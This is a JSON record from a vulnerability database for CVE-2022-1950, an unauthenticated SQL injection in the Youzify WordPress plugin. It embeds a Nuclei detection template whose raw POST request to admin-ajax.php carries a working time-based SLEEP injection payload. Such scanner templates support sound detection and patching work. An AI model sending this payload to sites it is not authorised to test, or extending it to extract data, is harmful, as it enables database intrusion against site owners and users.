{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-1950/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-1950/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-1950/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-1950/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-1950/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-1950"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-1950"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-1950.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2022-1950\n\ninfo:\n  name: Youzify < 1.2.0 - Unauthenticated SQLi\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    The Youzify WordPress plugin before 1.2.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection\n  impact: |\n    Unauthenticated attackers can execute time-based blind SQL injection via AJAX actions to extract database contents, potentially exposing all Youzify media and user data.\n  remediation: Fixed in 1.2.0\n  reference:\n    - https://wpscan.com/vulnerability/4352283f-dd43-4827-b417-0c55d0f4637d/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-1950\n    cwe-id: CWE-89\n    epss-score: 0.05513\n    epss-percentile: 0.92501\n    cpe: cpe:2.3:a:kainelabs:youzify:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: kainelabs\n    product: youzify\n    framework: wordpress\n    fofa-query: body=\"/wp-content/plugins/youzify\"\n  tags: cve,cve2022,youzify,wp,wp-plugin,wordpress,sqli,time-based-sqli,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=(SELECT 7958 FROM (SELECT(SLEEP(6)))XVfJ)\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration >= 6'\n          - 'contains(body, \"youzify-media\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450220750d84cd1a09f95e018a28432e57c8bc8c7f481a2d2943a3eeaa94c4cc7940f1022100f56cf2ec8137c4bcd2c14050e1e9bfaf0edbd047445388a594d00b610a699281:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-1950"
}